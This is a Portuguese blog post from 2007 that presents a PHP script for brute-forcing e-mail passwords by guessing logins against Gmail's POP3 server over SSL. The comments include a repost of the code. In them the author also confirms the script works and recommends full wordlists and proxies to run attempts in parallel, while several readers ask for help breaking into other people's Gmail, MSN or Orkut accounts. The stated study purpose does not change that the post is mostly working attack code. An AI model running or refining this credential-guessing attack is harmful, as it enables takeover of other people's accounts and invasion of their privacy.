HACK descobrindo senhas de e-mail

Setembro 10, 2007 on 11:38 am | In Informatica, php, Hacker |

Abrirei uma nova sessão de hacks, não afim de que meus leitores ownem (?) o mundo, mas sim para aprender os hacks de php afim de bolar soluções para se proteger contra isso. Vou começar com um hack para descobrir senhas utilizando BrutalForce no PHP através do POP3 dos emails, não irei explicar o que significa os jargões e como obter informações, sim somente uma demonstração de um código que foi disponibilizado pela Webzine do 0x000000.

Feito o script para o gmail, afim de que vejam que o nome do usuário é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.

o Código:

PLAIN TEXT
PHP:
  2.  
  3. ini_set("max_execution_time",0);
  4.  
  5.  
  6.  
  7. function bruteforce($email) {
  8.  
  9.  
  10.  
  11. $passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
  12.  
  13. $start      = 0;
  14.  
  15.  
  16.  
  17. while($forced == false && $start <= count($passlist)) {
  18.  
  19.  
  20.  
  21. usleep(1000000);
  22.  
  23.  
  24.  
  25. $ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40);
  26.  
  27.  
  28.  
  29. if (!$ssl) {
  30.  
  31.  
  32.  
  33. echo "$errdata" . " => " . "$err";
  34.  
  35.  
  36.  
  37. } else {
  38.  
  39.  
  40.  
  41. $auth = fgets($ssl, 128);
  42.  
  43. fputs($ssl, "USER ".$email."\n");
  44.  
  45. $auth = fgets($ssl, 128);
  46.  
  47. fputs($ssl, "PASS ".$passlist[$start]."\n");
  48.  
  49. $auth = fgets($ssl, 128);
  50.  
  51.  
  52.  
  53. $status = substr($auth, 0, 4);
  54.  
  55. if($status == "+OK ") {
  56.  
  57. $forced = true;
  58.  
  59. }
  60.  
  61.  
  62.  
  63. if($status == "-ERR") {
  64.  
  65. $forced = false;
  66.  
  67. $start++;
  68.  
  69. }
  70.  
  71.  
  72.  
  73. fclose ($ssl);
  74.  
  75.  
  76.  
  77. if($forced) {
  78.  
  80. <div style='background-color:lime;font-size:16px;'>Password found: $passlist[$start]</div>
  81. ";
  82.  
  83. }
  84.  
  85. }
  86.  
  87. }
  88.  
  89.  
  90.  
  91. return $forced;
  92.  
  93.  
  94.  
  95. }
  96.  
  97.  
  98.  
  99. bruteforce("bazookajoe@gmail.com");

Fonte : PHP POP3 BruteForcer.


27 Comments »

RSS feed for comments on this post. TrackBack URI

  1. Uia! O Silic0 é hacker e eu nao sabia? Vou testar isso aqui, Juro que se aparecer a senha do meu e-mail eu vou ficar assustado. Gostei de blog. Assinadasso =) Abraçuuu

    Comment by Fill — Setembro 12, 2007 #

  2. HAHAHAHA...

    So gerar a lista e rodar o BrutalForce... :P
    So calcular um tempo ai, vai demorar umas semanas. :)

    Mas da para char facim.

    Abraços

    Comment by silici0 — Setembro 12, 2007 #

  3. tipo assim nao entendi nada como q faz isso??????

    Comment by oi — Outubro 16, 2007 #

  4. ai fica dificil em...

    Em que parte você não entendeu?

    Abraços

    Comment by silici0 — Outubro 16, 2007 #

  5. Cara muito bom seu script, testei aki e funcionou, mas ...
    como seria no caso de fazer com que o script fizesse tentativa por brute force ( caracter por caracter ) sem usar lista de possiveis senhas?

    Dona Iguana

    Comment by iguana — Outubro 17, 2007 #

  6. Para ser sincero eu nao testei ainda, acredito que voce pode abrir a conexao ssl e depois ler a lista e tentar ir trocando a senha ate ter resposta certa.

    Nao se preucupe com o tempo o negocio eh demorado mesmo, por isso existem softwares que utilizam proxy para manter umas 5/10/20 tentativas ao mesmo tempo.

    ehhee ;)

    Abracos

    Comment by silici0 — Outubro 17, 2007 #

  7. Fala brother... po não funfo aqui o script não :S
    usando em localhost da erro ' 4408Unable to find the socket transport "ssl" '... e na web resulta uma pagina em branco
    sabe me dizer qq é isso?

    abs

    Comment by rasp — Novembro 2, 2007 #

  8. Provavelmente erro no fsockopen no seu localhost, verifique configurações do php para ver se utiliza e esta instalo suporte a essa função e outras.

    Em relação a página em branco so voçe olhar o codigo e entende-lo.. :P
    Da um debug nele.

    Abraços

    Comment by silici0 — Novembro 5, 2007 #

  9. aiii vc podeee tentaaa entraaa nooo meeeu orkut milk... fui paz

    Comment by Guilherme — Novembro 27, 2007 #

  10. aaiiii me mandaaaa poooo email Jaaa eh fui milk paz

    .|

    Comment by Guilherme — Novembro 27, 2007 #

  11. como consigo a senha do msn de uma pessoa ou como consigo rastrear tudo q essa pessoa digita no sem pc, inclusive suas conversas pelo msn. sei q existe um programa q manda tudo para o meu email. me ajudem, por favor!

    Comment by alex — Dezembro 13, 2007 #

  12. Não faço idéia...

    Me desculpe, mas a idéia do script é para fins de estudo das funções e funcionamentos...

    Comment by silici0 — Dezembro 13, 2007 #

  13. gostei do post !!!!
    naum consigo entrar no meu gmail eskeci a senha, teria como vc descobrir, me manda um email

    aobrigado

    Comment by andre — Fevereiro 2, 2008 #

  14. eu kero ke vc fex
    me dar senha

    Comment by fabiana — Abril 29, 2008 #

  15. Fabiana ?! não entendi

    Comment by silici0 — Abril 29, 2008 #

  16. Legal. Na verdade eu queria uma ajuda para consiguir o msn de uma pessoa q me vendeu um playstation 2 e sumiu do mapa. Q fria, vigatista!
    Queria alguma pista q me levasse a ele.
    Grato por qualquer ajuda.

    Comment by Adriano Santos — Maio 2, 2008 #

  17. Eu acho que seu melhor amigo é o google, para que possa achar o cara...

    Se tiver dados pessoais dele, vá a polícia, procom e Pro teste...

    Abraços

    Comment by silici0 — Maio 2, 2008 #

  18. viu esse negócio funciona como mesmo?! o que tem que fazer com esse código?! com ele consigo descobrir a senha de pessoas só tendo o e-mail delas e sem precisar do acesso delas no meu pc?!

    Comment by Marcia — Maio 5, 2008 #

  19. Funciona como a Dona Iguana testou e comprovou, pode rodar o script de qualquer local, você so precisa de uma lista de brutal force bem completa. ;P

    Abraços

    Comment by silici0 — Maio 5, 2008 #

  20. [...] Bom, pensando no script para brutal Force no gmail que postei fiquei pensando; como podemos gerar uma lista de palavras para que possamos testar o script ? Existem diversas wordlist generator por ae, porém precisamos uma em php que construa e teste; gerar um arquivo TXT é uma lastima, pois fica gigantesto, então nada de pegar pronto, o negocio é gerar na mão. Mas o que é esse tal de wordlist então ? Nós podemos chamar de dicionário de palavras, nesta lista terá as palavras inimaginarias e imaginarias para que ao tentar crackear uma conta teste cada palavra como senha, o ideal para está lista seria ter todos as possíveis palavras. [...]

    Pingback by Silici0 :: Blog » WordList em PHP para cracks — Maio 8, 2008 #

  21. realmente .. pode ate funcionar .. mas demora .. e demora muitoooo

    Comment by la la la — Maio 28, 2008 #

  22. fiz uma compra e o malandro n me enviou o produto, como descubro a senha do gmail dele, eu tendo so o login?

    Comment by FElipe andrade — Maio 29, 2008 #

  23. Como é que copia??

    Comment by anonimo — Junho 29, 2008 #

  24. e ai mano

    Comment by marcelo — Julho 16, 2008 #

  25. error_reporting(0);

    ini_set("max_execution_time",0);

    function bruteforce($email) {

    $passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');

    $start = 0;

    while($forced == false && $start " . "$err";

    } else {

    $auth = fgets($ssl, 128);

    fputs($ssl, "USER ".$email."\n");

    $auth = fgets($ssl, 128);

    fputs($ssl, "PASS ".$passlist[$start]."\n");

    $auth = fgets($ssl, 128);

    $status = substr($auth, 0, 4);

    if($status == "+OK ") {

    $forced = true;

    }

    if($status == "-ERR") {

    $forced = false;

    $start++;

    }

    fclose ($ssl);

    if($forced) {

    echo "
    Password found: $passlist[$start]
    ";

    }

    }

    }

    return $forced;

    }

    bruteforce("bazookajoe@gmail.com");

    Comment by marcelo — Julho 16, 2008 #

  26. alguem pode me passar um e-mail esplicando passo a passo como fazer isso?....por favor é pq eu fiquei confuso, abraço.

    Comment by Matheus — Julho 24, 2008 #

  27. POR FAVOR... EU LI PESSO

    Comment by Matheus — Julho 24, 2008 #

Leave a comment

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>


 

 Assine o feed